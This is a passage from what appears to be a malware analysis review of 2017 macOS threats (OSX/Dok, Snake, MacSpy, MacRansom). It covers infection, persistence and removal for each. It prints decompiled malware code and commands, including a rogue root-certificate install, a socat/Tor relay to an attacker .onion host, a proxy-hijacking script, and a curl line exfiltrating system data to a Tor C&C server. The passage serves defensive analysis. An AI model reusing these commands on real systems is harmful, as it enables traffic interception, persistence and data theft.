This approach is\r\nsomewhat simpler than adding a Login Item purely via APIs (such as SMLoginItemSetEnabled).\r\nThe installed Login Item will show up in the UI (image credit CheckPoint):\r\nIn order to elevate its privileges to persist its payload (described below), Dok displays a fake (full-screen) update window\r\nthat contains a single 'Update All' button. When this button is clicked, the malware will display an authorization dialog:\r\nIt's likely that the user will enter their credentials at some point, since, as noted by Thomas Reed, \"[the screen will] remain\r\nstubbornly on the screen and will come back on restart\".\r\nArmed with the user's credentials, the malware will perform various nefarious actions, including the creation of two\r\npersistent Launch Agent property lists: com.apple.Safari.pac.plist and com.apple.Safari.proxy.plist. The code for this can be\r\nfound in the InstallTor method:\r\n void -[AppDelegate InstallTor](void * self, void * _cmd) {\r\n rbx = [[var_38 stringByAppendingPathComponent:@\"com.apple.Safari.pac\",\r\n @\"/usr/local/bin/socat\", r8];\r\n r14 = [[rbx stringByAppendingPathExtension:@\"plist\", @\"/usr/local/bin/socat\", r8];\r\n rbx = [[var_38 stringByAppendingPathComponent:@\"com.apple.Safari.proxy\",\r\n @\"/usr/local/bin/socat\", r8];\r\n r12 = [[rbx stringByAppendingPathExtension:@\"plist\", @\"/usr/local/bin/socat\", r8];\r\n rax = [NSMutableDictionary alloc];\r\n rax = [rax init];\r\n\r\n r14 = rax;\r\n [rax setObject:@\"com.apple.Safari.pac\" forKeyedSubscript:@\"Label\",\r\n @\"/usr/local/bin/brew\"];\r\n rax = [NSString stringWithFormat:@\"SOCKS4A:127.0.0.1:%@:80,socksport=9050\",\r\n @\"paoyu7gub72lykuk.onion\"];\r\n\r\n rbx = [[NSArray arrayWithObjects:@\"/usr/local/bin/socat\", @\"tcp4-LISTEN:5555,\r\n reuseaddr,fork,keepalive,bind=127.0.0.1\", rax, 0x0] retain];\r\n\r\n [r14 setObject:rbx forKeyedSubscript:@\"ProgramArguments\", 
rax];\r\n rbx = [@(YES) retain];\r\n [r14 setObject:rbx forKey:@\"RunAtLoad\", rax];\r\n\r\n rbx = [@(YES) retain];\r\n [r14 setObject:rbx forKey:@\"KeepAlive\", rax];\r\n [r14 writeToFile:var_50 atomically:0x1, rax];\r\n\r\nDumping either of these plists, we can see the malware has persisted socat (a well-known relay/proxy utility):\r\n $ cat ~/Library/LaunchAgents/com.client.client.plist\r\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n \u003cplist version=\"1.0\"\u003e\r\n \u003cdict\u003e\r\n   \u003ckey\u003eKeepAlive\u003c/key\u003e\r\n   \u003ctrue/\u003e\r\n   \u003ckey\u003eLabel\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.Safari.pac\u003c/string\u003e\r\n   \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n   \u003carray\u003e\r\n     \u003cstring\u003e/usr/local/bin/socat\u003c/string\u003e\r\n     \u003cstring\u003etcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1\u003c/string\u003e\r\n     \u003cstring\u003eSOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050\u003c/string\u003e\r\n   \u003c/array\u003e\r\n   \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n   \u003ctrue/\u003e\r\n   ...\r\nAs the RunAtLoad key in the plists has been set to true, socat will be automatically started each time the system is rebooted\r\nand the user logs in (and KeepAlive makes launchd restart it if it is killed). In socat's address syntax, this listens on\r\n127.0.0.1:5555 and relays each connection through the local Tor SOCKS proxy (127.0.0.1:9050, tor's default SOCKS port) to\r\nport 80 of the attacker's .onion host; this is the listener the auto-proxy URL described below points at.\r\n features:\r\nThomas Reed, who also analyzed OSX/Dok, describes the malware's main goal:\r\n\"[OSX.Dok] uses sophisticated means to monitor-and potentially alter-all HTTP and HTTPS traffic to and from the infected\r\nMac. This means that the malware is capable, for example, of capturing account credentials for any website users log into,\r\nwhich offers many opportunities for theft of cash and data.\"\r\nInstalling a proxy to MitM traffic is a common technique found in Windows banking trojans, which try to steal users' banking\r\ncredentials. As previously noted, Dok appears to be a Mac port of the Windows banking trojan 'Retefe.'\r\nLet's take a closer look at how the malware is able to proxy all web traffic on an infected host.\r\nFirst the malware kills all running browsers, by executing the CloseAllBrowsers method:\r\n void -[AppDelegate CloseAllBrowsers]\r\n {\r\n [@\"killall Safari\" runAsCommand];\r\n [@\"killall firefox\" runAsCommand];\r\n [@\"killall \\\"Google Chrome\\\"\" runAsCommand];\r\n return;\r\n }\r\nIt then installs a new root certificate, \"which allows the attacker to intercept the victim’s traffic using a Man in The Middle\r\n(MiTM) attack\" (Checkpoint). 
In order to install this certificate, the malware simply executes the security command with\r\nthe add-trusted-cert flag. Looking at the InstallCert method we can see this logic:\r\n void -[AppDelegate InstallCert]\r\n {\r\n rbx = [[NSData dataWithBytes:0x100008680 length:*(int32_t *)dword] retain];\r\n var_38 = rbx;\r\n r13 = [[@\"/tmp/\" stringByAppendingPathComponent:@\"cert.der\"] retain];\r\n [rbx writeToFile:r13 atomically:0x0];\r\n\r\n r15 = [NSString stringWithFormat:@\"security add-trusted-cert -d -r trustRoot\r\n -k /Library/Keychains/System.keychain %@\", r13];\r\n r12 = [r15 runAsCommand];\r\n\r\n return;\r\n }\r\nThe -d flag targets the admin (system-wide) trust settings, which is why the phished credentials were needed, and -r trustRoot\r\nmarks the certificate as a trusted root for all policies, so every browser and app that uses the system trust store will accept\r\ncertificates the attacker's proxy mints with it.\r\nHere's the installed certificate (image credit: CheckPoint):\r\nOnce the attacker's certificate has been installed, the malware invokes the InstallTor method. Unsurprisingly, this installs tor.\r\nIn order to install this (and other utilities, most notably the proxy socat), the malware first downloads and installs\r\nHomebrew:\r\n rbx = [NSString stringWithFormat:@\"sudo -u %@ echo |sudo -u %@ /usr/bin/ruby -e\r\n \\\"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\\\"\"];\r\n [rbx runAsCommand];\r\nThis method also installs the aforementioned Launch Agent plist files, which ensure the proxy, socat, is always running.\r\nFinally, the malware modifies the infected host's network settings in order to set up a proxy whose address is (dynamically)\r\nspecified via a remote proxy auto-configuration (PAC) file. 
This is accomplished by decoding then executing a base64-encoded string (which turns out to be a script which re-configures\r\nnetwork settings):\r\n $ python\r\n \u003e\u003e\u003e import base64\r\n \u003e\u003e\u003e base64.b64decode('IyEvYmluL3NoC...XMiCg==')\r\n #!/bin/sh\r\n ip=$(curl api.ipify.org)\r\n str=$(env LC_CTYPE=C tr -dc \"a-zA-Z0-9\" \u003c /dev/urandom | head -c 10)\r\n autoProxyURL=\"http://127.0.0.1:5555/${str}.js?ip=${ip}\"\r\n /usr/sbin/networksetup -detectnewhardware\r\n IFS=$'\\n'\r\n for i in $(networksetup -listallnetworkservices | tail +2 );\r\n do\r\n autoProxyURLLocal=`/usr/sbin/networksetup -getautoproxyurl \"$i\" | head -1 | cut -c 6-`\r\n echo \"$i Proxy set to $autoProxyURLLocal\"\r\n if [[ $autoProxyURLLocal != $autoProxyURL ]]; then\r\n /usr/sbin/networksetup -setautoproxyurl $i $autoProxyURL\r\n echo \"Set auto proxy for $i to $autoProxyURL\"\r\n fi\r\n /usr/sbin/networksetup -setautoproxystate \"$i\" on\r\n echo \"Turned on auto proxy for $i\"\r\n \r\n done\r\n unset IFS\r\n echo \"Auto proxy present, correct \u0026 enabled for all interfaces\"\r\nNote that the PAC URL points at the local socat listener (127.0.0.1:5555), that its path is a random 10-character name, and\r\nthat the victim's public IP (looked up via api.ipify.org) is passed along as a query parameter, presumably so the attacker's\r\nserver can tailor the returned proxy rules per victim.\r\nOne can see this malicious network reconfiguration via the Network pane in System Preferences (image credit: CheckPoint):\r\nOnce the malware has installed the attacker certificate, installed tor and socat, and reconfigured the infected host's network\r\nsettings, all the user's traffic will be proxied through the attacker's infrastructure. This is perhaps more eloquently stated by the\r\nCheckPoint researchers:\r\n\"As a result of all of the above actions, when attempting to surf the web, the user's web browser will first ask the attacker\r\nweb page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who\r\ncarries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. 
The attacker is free to\r\nread the victim's traffic and tamper with it in any way they please.\"\r\nSo why redirect the user's traffic? Well, any number of reasons. However, as OSX/Dok is a port of a Windows banking\r\ntrojan (Retefe), its main goal is to extract users' banking credentials from the redirected traffic, or manipulate traffic in order\r\nto gain access to financial accounts. For more information on this methodology, check out CheckPoint's follow-up report:\r\nOSX/Dok Refuses to Go Away and It's After Your Money.\r\n disinfection:\r\nFully cleaning up an OSX/Dok infection is somewhat difficult due to the multitude of changes it makes to an infected system.\r\n(As Thomas Reed notes, \"there are many leftovers and modifications to the system that cannot be as easily reversed.\")\r\nFirst, if it still exists, remove the malware's initial Login Item ('AppStore').\r\nThen, delete the two Launch Agents:\r\n1. Unload the malware's persistent launch agents via the 'launchctl unload' command:\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.Safari.pac.plist\r\n$ launchctl unload ~/Library/LaunchAgents/com.apple.Safari.proxy.plist\r\n2. Remove the malicious launch agent plist files:\r\n~/Library/LaunchAgents/com.apple.Safari.pac.plist\r\n~/Library/LaunchAgents/com.apple.Safari.proxy.plist\r\nNext, remove the attacker's certificate that was added to the system, using the Keychain Access application (certificate\r\nname: COMODO RSA Extended Validation Secure Server CA 2).\r\nFinally, remove tor and socat via Homebrew (i.e. $ brew rm FORMULA). 
If you didn't have Homebrew already installed -\r\nmeaning the malware installed it, that can be removed as well.\r\nHonestly, if infected with OSX/Dok it's suggested you just fully re-install macOS!\r\n Snake\r\nfound: May, Fox-IT\r\ninfection: trojanized Flash Installer\r\nfeatures: currently in development, but likely 'standard' cyber-espionage capabilities\r\ndisinfection: remove launch daemon\r\nwriteups:\r\n\"Snake: Coming soon in Mac OS X flavour\" (Fox-IT)\r\n\"Snake malware ported from Windows to Mac\" (MalwareBytes)\r\nAn in-progress port of the highly sophisticated Windows 'Snake' cyber-espionage persistent implant, the Mac version has yet\r\nto be seen (publicly) in the wild, nor is it fully-featured... yet!\r\n infection:\r\nFox-IT, the company that originally discovered the Mac version of Snake, notes the following:\r\n\"Though Snake is typically spread using spear-phishing e-mails and watering hole attacks Fox-IT has not yet observed this\r\n[macOS] sample being spread in the wild.\"\r\n\"As this version contains debug functionalities ....it is likely that the OS X version of Snake is not yet operational.\"\r\nSince (at the time of discovery) the macOS version of Snake is likely not yet operational, it is not surprising that it has yet to\r\nbe seen infecting Mac users in the wild.\r\nWhat we do know is that Snake is packaged in a trojanized Adobe Flash installer:\r\nThis infected installer application is (re)signed, to ensure that it won't be blocked by Gatekeeper (in its default setting):\r\n $ ./jtool --sig \"Install Adobe Flash Player.app/Install\"\r\n Blob at offset: 46992 (9616 bytes) is an embedded signature\r\n Code Directory (390 bytes)\r\n Version: 20200\r\n Flags: none\r\n CodeLimit: 0xb790\r\n Identifier: com.addy.InstallAdobeFlash (0x34)\r\n Team ID: EHWBRW848H (0x4f)\r\n CDHash: ffc1a65f9153c94999212fb8bd7e3950eca035ae (computed)\r\nAs shown by WhatsYourSign, this certificate was revoked by 
Apple:\r\nSince the format of the trojaned application bundle is rather non-standard (i.e. it's missing the Contents/MacOS/ directory) it is\r\nnot immediately clear what binary will be executed when the application is launched. However, by dumping the\r\napplication's Info.plist file, and looking at the value of the CFBundleExecutable key, we can see it's a binary named Install:\r\n $ defaults read ~/Downloads/Snake/Install\\ Adobe\\ Flash\\ Player.app/Info.plist\r\n {\r\n BuildMachineOSBuild = 13F34;\r\n CFBundleDevelopmentRegion = en;\r\n CFBundleExecutable = Install;\r\n CFBundleIconFile = \"app.icns\";\r\n CFBundleIdentifier = \"com.addy.InstallAdobeFlash\";\r\n CFBundleInfoDictionaryVersion = \"6.0\";\r\n CFBundleName = \"Install Adobe Flash Player\";\r\n ...\r\n }\r\nInstall is a simple binary whose main job is to execute a script, install.sh, via the \"do shell script [script] with\r\nadministrator privileges\" AppleScript command:\r\n int _main(int arg0, int arg1) {\r\n rax = [NSBundle mainBundle];\r\n rax = [rax retain];\r\n rax = [rax bundlePath];\r\n rax = [NSString stringWithFormat:@\"'%@%@'\", rax, @\"/install.sh\"];\r\n var_A8 = [NSString stringWithFormat:@\"do shell script \\\"%@\\\" with administrator\r\n privileges\", rax];\r\n var_B0 = [[NSAppleScript alloc] initWithSource:var_A8];\r\n var_188 = [var_B0 executeAndReturnError:\u0026var_B8];\r\n ...\r\nExecuting this AppleScript command will first cause the system to display a standard authentication prompt (due to the\r\n\"with administrator privileges\"):\r\nAs installers, such as Flash, typically display such authentication prompts, it's likely the user will naively enter their\r\ncredentials. 
At this point, the install.sh script will be executed with elevated privileges.\r\nLet's dump the install.sh script:\r\n #!/bin/sh\r\n SCRIPT_DIR=$(dirname \"$0\")\r\n TARGET_PATH=/Library/Scripts\r\n TARGET_PATH2=/Library/LaunchDaemons\r\n cp -f \"${SCRIPT_DIR}/queue\" \"${TARGET_PATH}/queue\"\r\n cp -f \"${SCRIPT_DIR}/installdp\" \"${TARGET_PATH}/installdp\"\r\n cp -f \"${SCRIPT_DIR}/installd.sh\" \"${TARGET_PATH}/installd.sh\"\r\n cp -f \"${SCRIPT_DIR}/com.adobe.update\" \"$TARGET_PATH2/com.adobe.update.plist\"\r\n \"${TARGET_PATH}/installd.sh\"\r\n \"${SCRIPT_DIR}/Install Adobe Flash Player\"\r\n exit $RC\r\nIt's easy to see that it:\r\ncopies several files (queue, installdp, etc.) to the /Library/Scripts directory\r\npersists the com.adobe.update file as a Launch Daemon\r\nexecutes the installd.sh script\r\nkicks off the legitimate Flash installer, Install Adobe Flash Player\r\n persistence:\r\nThe persistent part of the infection is the com.adobe.update Launch Daemon. As it's a binary plist file, dump its contents\r\nwith the plutil utility (using the -p commandline flag):\r\n $ plutil -p com.adobe.update\r\n {\r\n \"KeepAlive\" =\u003e 1\r\n \"Label\" =\u003e \"com.apple.update\"\r\n \"OnDemand\" =\u003e 1\r\n \"POSIXSpawnType\" =\u003e \"Interactive\"\r\n \"ProgramArguments\" =\u003e [\r\n 0 =\u003e \"/Library/Scripts/installd.sh\"\r\n ]\r\n }\r\nAs the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started every time the infected\r\nsystem is rebooted. 
Looking at the ProgramArguments array, we can see it's persisting the installd.sh script:\r\n #!/bin/bash\r\n SCRIPT_DIR=$(dirname \"$0\")\r\n FILE=\"${SCRIPT_DIR}/queue#1\"\r\n PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`\r\n if [ -z \"$PIDS\" ]; then\r\n ${SCRIPT_DIR}/installdp ${FILE} n\r\n fi\r\nAs noted by the Fox-IT researchers, this \"script checks if installdp is already running, if not it will start with\r\n/Library/Scripts/queue#1 n.\" In other words, the installdp binary - which is the malware's main component - will be\r\nautomatically started whenever the OS is initialized.\r\n features:\r\nThis macOS port of Snake appears to be a test (or debug) build. The Fox-IT write up highlights various strings embedded\r\nwithin installdp that back up this claim:\r\n 000000010013cf20 db \"Usage: snake_test e[vent]|n[ormal]\\n\", 0\r\n 000000010013cf7d db \"../../../snake/snake_test.c\", 0\r\nThey also note that though Snake binaries contain obfuscated strings (possibly commands or config data?), in the macOS\r\nversion there are only \"placeholders that are yet to be replaced by the actual values, which is another indication that this\r\nSnake binary is not yet ready to deploy to targets.\"\r\nSo what does Snake actually do? This is a good question! First, if we look at the Windows version (which has been well\r\nstudied by the anti-virus industry), holy $h!t, it's legit! Seriously, go read the reports about this malware and its operations:\r\n\"The Epic Turla Operation\" (Kaspersky)\r\n\"Satellite Turla: APT Command and Control in the Sky\" (Kaspersky)\r\n\"The Snake Campaign\" (BAE Systems)\r\n0days, successful penetration of classified networks, C\u0026C via satellite link hijacking....in a way, stunningly beautiful!\r\nBack to the Mac version though...honestly it's tough to know the extent of its capabilities.\r\nFirst, as already noted, it does not appear to be ready to deploy. 
Thus it's possible that features or capabilities have not yet\r\nbeen implemented or configured in the macOS version. For example, the malware contains a function named hide_module.\r\nLooking at its disassembly however, we can see it's not (yet?) implemented:\r\n hide_module:\r\n 00000001000093d0 push rbp\r\n 00000001000093d1 mov rbp, rsp\r\n 00000001000093d4 pop rbp\r\n 00000001000093d5 ret\r\nSecond, as Snake is part of an incredibly sophisticated cyber-espionage operation, we've seen operators (on the Windows side\r\nof the house) utilize capabilities in a modular fashion. Looking at function names within the installdp binary, it appears to\r\nsupport a similar modular-based plugin architecture:\r\nThis means that analyzing any single component of the malware individually (i.e. just the installdp binary) may be akin to\r\nlooking at a single piece of a complex puzzle. Rather hard to get a full understanding.\r\nFinally, the Fox-IT report states that:\r\n \"Builds of Snake generally contain a Queue file. Queue files are used to store Snake's\r\n configuration data, module binaries and queued network packets\".\r\nAnd while the macOS sample does contain such a queue file, I am not sure how to decrypt or understand it fully. 
Note that\r\nthe Fox-IT researchers dump some of its content and extract \"transport chains\":\r\n $ python MM_snake_queuefile.py queue\r\n OFFSET STREAM TYPE ID SIZE WRITTEN DATA\r\n 2017-02-10 12:23:22 '\\x98\\xa7w{\\xc7\\xcc4\\x03-\\xdcz\\x0b\\xc9,`\\x1c'\r\n 2017-02-10 12:23:22 '\\x90*\\xa6\\xc5c\\x89H\\xe2\u003e\\x9fS\\x1f\\xb2\\x0b\\xf8\\xb7'\r\n 2017-02-10 12:23:22 '\\x95\\x9a\\xdf\\x82\\xf8l\\xbe.YR)\\xcc\\x1a{\\xac\\x8f'\r\n 2017-02-10 12:23:22 '300000\\x00'\r\n 2017-02-10 12:23:22 '600000\\x00'\r\n 2017-02-10 12:23:22 '20000\\x00'\r\n 2017-02-10 12:23:22 '4096\\x00'\r\n 2017-02-10 12:23:22 '65536\\x00'\r\n 2017-02-10 12:23:22 '4096\\x00'\r\n 2017-02-10 12:23:22 '65536\\x00'\r\n 2017-02-10 12:23:22 '1000\\x00'\r\n 2017-02-10 12:23:22 '\\xfb \\xb20\\x87\\xb9m\\xa2\\x80!\\x80\\xcc\\x1aJbX'\r\n 2017-02-10 12:23:22 '0xfd4488e9\\x00'\r\n 2017-02-10 12:23:22 '0\\x00'\r\n 2017-02-10 12:23:22 '2\\x00'\r\n 2017-02-10 12:23:22 'enc.unix//tmp/.gdm-socket\\x00'\r\n 2017-02-10 12:23:22 'enc.frag.reliable.doms.unix//tmp/.gdm-selinux\\x00'\r\n 2017-02-10 12:23:22 'read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\\x00'\r\n 2017-02-10 12:23:22 'psk=R@gw1gBsRP!5!yj0\\x00'\r\n 2017-02-10 12:23:23 '1\\x00'\r\n 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\n 2017-02-10 12:23:23 '1\\x00'\r\n 2017-02-10 12:23:23 'enc.http.tcp/car-service.effers.com:80\\x00'\r\n 2017-02-10 12:23:23 'psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00'\r\nHowever, we can still get some insight into the malware's features. 
For example there are various functions in the malware\r\n(named snake_cmd*) that appear to support standard backdoor features or capabilities such as reading/writing files,\r\nexecuting commands, listing running processes, and surveying an infected system:\r\nTaking a closer look, say at the snake_cmd_kill command, we can see that it invokes the kill API to terminate a process:\r\n int _snake_cmd_kill() {\r\n rbx = rdx;\r\n rcx = _data_from_params(rbx, 0x2, 0x2, \u0026var_C, 0x4);\r\n rax = 0x21590065;\r\n if (rcx != 0x0) {\r\n var_10 = 0x9;\r\n _data_from_params(rbx, 0x6, 0x2, \u0026var_10, 0x4);\r\n rcx = kill(var_C, var_10);\r\n rax = 0x0;\r\n if (rcx == 0xffffffff) {\r\n rax = rcx;\r\n }\r\n }\r\n return rax;\r\n }\r\nThe implant also appears to support more advanced features, such as the ability to execute libraries directly from memory,\r\nvia the NSCreateObjectFileImageFromMemory and NSLinkModule APIs:\r\n int _LdrInjectLibraryA(int arg0, int arg1, int arg2) {\r\n r14 = r9;\r\n r15 = arg2;\r\n r12 = arg1;\r\n rbx = arg0;\r\n if (rbx != 0x0) {\r\n rcx = sign_extend_64(getpid());\r\n rax = 0x21590001;\r\n if (rcx == rbx) {\r\n var_28 = 0x0;\r\n rcx = NSCreateObjectFileImageFromMemory(r12, r15, \u0026var_28);\r\n rax = 0xffffffff;\r\n if (rcx == 0x1) {\r\n rax = NSLinkModule(0x0, \"\", 0x7);\r\n *r14 = rax;\r\n CMP(rax, 0x1);\r\n rax = rax - rax + CARRY(RFLAGS(cf));\r\n }\r\n }\r\n }\r\n else {\r\n var_28 = 0x0;\r\n rcx = NSCreateObjectFileImageFromMemory(r12, r15, \u0026var_28);\r\n rax = 0xffffffff;\r\n if (rcx == 0x1) {\r\n rax = NSLinkModule(0x0, \"\", 0x7);\r\n *r14 = rax;\r\n CMP(rax, 0x1);\r\n rax = rax - rax + CARRY(RFLAGS(cf));\r\n }\r\n }\r\n return rax;\r\n }\r\nFor more info on directly executing binaries from memory, see: \"Running Executables on macOS From Memory\"\r\nFinally, if you're still doubting the potential of 
this malware, note that \"car-service.effers.com\" is the domain (as pointed\r\nout by Fox-IT) which the macOS version of Snake is configured to utilize for HTTP network transport. Why is this\r\ninteresting? Because \"the resolving IP belongs to a Satellite communications provider\" ... did somebody say satellite-based\r\nC\u0026C?\r\n disinfection:\r\nAs this version of OSX/Snake simply persists as a Launch Daemon, it's trivial to remove from an infected system.\r\n1. Unload the malware's persistent Launch Daemon via the 'launchctl unload' command:\r\n$ launchctl unload /Library/LaunchDaemons/com.adobe.update.plist\r\n2. Remove the malicious Launch Daemon plist file /Library/LaunchDaemons/com.adobe.update.plist\r\n3. Remove the malware's persistent script (installd.sh), binary (installdp), and queue file (queue) from the\r\n/Library/Scripts directory\r\nHonestly though, if you're infected with OSX/Snake - due to the sophistication of the actors associated with this malware -\r\nyou should at a minimum fully re-install macOS! Better yet, just burn everything down and start over.\r\n MacSpy\r\nfound: June, Catalin Cimpanu (@campuscodi)\r\ninfection: n/a\r\nfeatures: fully-featured backdoor, with the ability to collect keystrokes, screenshots, audio, \u0026 more.\r\ndisinfection: remove launch agent\r\nwriteups:\r\n\"MacSpy: OS X RAT as a Service\" (AlienVault)\r\n\"New Mac Malware-as-a-Service offerings\" (MalwareBytes)\r\nMacSpy is (AFAIK) the first 'Malware-as-a-Service' (MaaS) for macOS. Offered on the 'dark web', it's a fairly standard\r\nbackdoor (RAT), though it does support a wide range of features such as collecting keystrokes, screenshots, audio, clipboard\r\ndata, and more.\r\n infection:\r\nAs MacSpy is offered by the author as a pre-built binary (i.e. 'Malware-as-a-Service'), it is up to the consumer of the\r\nmalware to find a way to infect target computers. 
As noted in AlienVault's writeup, the malware author suggests manually\r\ncopying it to the target Mac, then manually executing it:\r\nUsing WhatsYourSign, we can see this malware's binary image is not signed:\r\nAs such, Gatekeeper should block the malware from executing - unless the user (or attacker locally installing the malware)\r\nexplicitly agrees to allow the unsigned malicious code to execute.\r\n persistence:\r\nMacSpy persists as a LaunchAgent. When executed, the malware will dynamically build the launch agent plist (see\r\nsub_10008c510):\r\n void sub_10008c510() {\r\n xmm0 = intrinsic_punpcklqdq(zero_extend_64(\"\\n\"), zero_extend_64(0x27));\r\n var_40 = intrinsic_movdqa(var_40, xmm0);\r\n var_30 = 0x0;\r\n sub_1002f3030(\"\u003c!DOCTYPE plist PUBLIC \\\"-//Apple//DTD PLIST 1.0//EN\\\" ... \u0026var_40);\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n sub_1002f3030(\"\u003cplist version=\\\"1.0\\\"\u003e\\n\", 0x16, 0x0, \u0026var_40);\r\n ...\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n rcx = \u0026var_40;\r\n sub_1002f3030(\"\\t\\t\u003ckey\u003eProgram\u003c/key\u003e\\n\", 0x15, 0x0, rcx);\r\n }\r\n ...\r\n if ((var_38 \u0026 0x3fffffffffffffff) != 0x0) {\r\n sub_1002f3030(\"\\t\\t\u003ckey\u003eRunAtLoad\u003c/key\u003e\\n\", 0x17, 0x0, \u0026var_40);\r\n }\r\nThis plist is saved to ~/Library/LaunchAgents/com.apple.webkit.plist. As the RunAtLoad key is set to true, the value in the\r\nProgram key will be executed automatically whenever the user logs in. 
The value of this key is set to\r\n~/Library/.DS_Stores/updated, which is a persistent copy of the malware:\r\n $ cat ~/Library/LaunchAgents/com.apple.webkit.plist\r\n \u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n \u003cplist version=\"1.0\"\u003e\r\n \u003cdict\u003e\r\n   \u003ckey\u003eLabel\u003c/key\u003e\r\n   \u003cstring\u003ecom.apple.webkit\u003c/string\u003e\r\n   \u003ckey\u003eProgram\u003c/key\u003e\r\n   \u003cstring\u003e/Users/user/Library/.DS_Stores/updated\u003c/string\u003e\r\n   \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n   \u003carray\u003e\r\n     \u003cstring\u003edaemon\u003c/string\u003e\r\n   \u003c/array\u003e\r\n   \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n   \u003ctrue/\u003e\r\n   \u003ckey\u003eKeepAlive\u003c/key\u003e\r\n   \u003ctrue/\u003e\r\n \u003c/dict\u003e\r\n \u003c/plist\u003e\r\n features:\nMacSpy claims to be the \"most sophisticated Mac spyware\":\nHowever Thomas Reed notes that in reality \"MacSpy is fairly simple spyware, which gathers data into temporary files and\nsends those files periodically back to a Tor command \u0026 control (C\u0026C) server via unencrypted http.\"\nOne thing is for sure: MacSpy does support a decent set of features designed to 'spy' or collect data about infected systems.\nIts author kindly documented its features:\nA paid version of the malware apparently contains even more features, such as full exfiltration capabilities, ransomware\r\nabilities, and access to social media data:\r\nOther 'features' of MacSpy include anti-debugging and anti-VM logic. As AlienVault notes in their writeup, this includes:\r\ninvoking ptrace with PT_DENY_ATTACH to prevent debuggers (such as lldb) from attaching\r\ninvoking sysctl with KERN_PROC and KERN_PROC_PID, then checking if the P_TRACED flag is set, to detect\r\nruntime debugging\r\nchecking to make sure it's executing on a system with more than one CPU and at least 4GB of memory (on most\r\ndefault virtual machine images, this check will fail)\r\nchecking to make sure it's executing on a machine whose model contains 'Mac'. On a virtual machine, this check will\r\nfail:\r\n $ sysctl hw.model\r\n hw.model: VMware7,1\r\nIn terms of exfiltration, MacSpy utilizes Tor. 
The malware ships with various legitimate Tor binaries (named webkitproxy\r\nand libevent-2.0.5.dylib) that allow it to connect to the Tor network. Specifically, it sets up a local Tor proxy and utilizes curl\r\nin order to route all its traffic to its Tor-based C\u0026C server.\r\nHere's an example of MacSpy exfiltrating various survey data (stored by the malware in\r\n~/Library/.DS_Stores/data/tmp/SystemInfo):\r\n /usr/bin/curl --fail -m 25 --socks5-hostname 127.0.0.1:47905 -ks -X POST -H key: -H\r\n type:system -H Content-Type:multipart/form-data\r\n -F system=@'/Users/user/Library/.DS_Stores/data/tmp/SystemInfo'\r\n http://\u003credacted\u003e.onion/upload\r\n disinfection:\r\nMacSpy can easily be removed from an infected system, via the following steps:\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command:\r\n $ launchctl unload ~/Library/LaunchAgents/com.apple.webkit.plist\r\n2. Remove the malicious launch agent plist file ~/Library/LaunchAgents/com.apple.webkit.plist\r\n3. Remove the directory ~/Library/.DS_Stores/, created by the malware, which contains its persistent backdoor (updated) and\r\nother components.\r\n MacRansom\r\nfound: June, Fortinet\r\ninfection: n/a\r\nfeatures: persistent ransomware\r\ndisinfection: remove launch agent\r\nwriteups:\r\n\"MacRansom: Offered as Ransomware as a Service\" (Fortinet)\r\n\"MacRansom: Analyzing the Latest Ransomware to Target Macs\" (Objective-See)\r\nMacRansom is the first 'Ransomware-as-a-Service' for macOS, which aims to encrypt (ransom) all of the user's files. Likely\r\ncreated by the same author who coded up MacSpy, it was similarly offered on the 'dark web' for download.\r\n infection:\r\nMacRansom is offered by the author, on Tor, as a pre-built binary (i.e. 
'Malware-as-a-Service'):\r\nIt is up to the consumer of the malware to find a way to infect target computers.\r\nThe Fortinet researchers corresponded with the malware author, who noted that in order to infect a victim the malware\r\nshould be run (manually) off a USB stick:\r\nRather lame...but of course 'consumers' of the malware could deploy it in other manners (e.g. email attachments, etc.).\r\n persistence:\r\nMacRansom persists as a LaunchAgent. It does this by:\r\n1. Copying itself to ~/Library/.FS_Store\r\n2. Decoding an embedded plist and writing it out to ~/Library/LaunchAgents/com.apple.finder.plist:\r\n$ cat ~/Library/LaunchAgents/com.apple.finder.plist\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n  \u003ckey\u003eLabel\u003c/key\u003e\r\n  \u003cstring\u003ecom.apple.finder\u003c/string\u003e\r\n  \u003ckey\u003eStartInterval\u003c/key\u003e\r\n  \u003cinteger\u003e120\u003c/integer\u003e\r\n  \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n  \u003ctrue/\u003e\r\n  \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n  \u003carray\u003e\r\n    \u003cstring\u003ebash\u003c/string\u003e\r\n    \u003cstring\u003e-c\u003c/string\u003e\r\n    \u003cstring\u003e! pgrep -x .FS_Store \u0026\u0026 ~/Library/.FS_Store\u003c/string\u003e\r\n  \u003c/array\u003e\r\n\u003c/dict\u003e\r\n\u003c/plist\u003e\r\nAs the 'RunAtLoad' key is set to 'true', the malware will be automatically started whenever the user logs in. Specifically, the\nOS will execute the value of the 'ProgramArguments' key: bash -c ! pgrep -x .FS_Store \u0026\u0026 ~/Library/.FS_Store. This\ncommand will first check to make sure the malware isn't already running, then will start the malware (~/Library/.FS_Store).\nLucky for Objective-See users, BlockBlock will alert you about this persistence attempt:\nAs the malware first attempts to persist before encrypting any files, clicking 'Block' on the BlockBlock alert will stop the\nmalware before it's done any damage 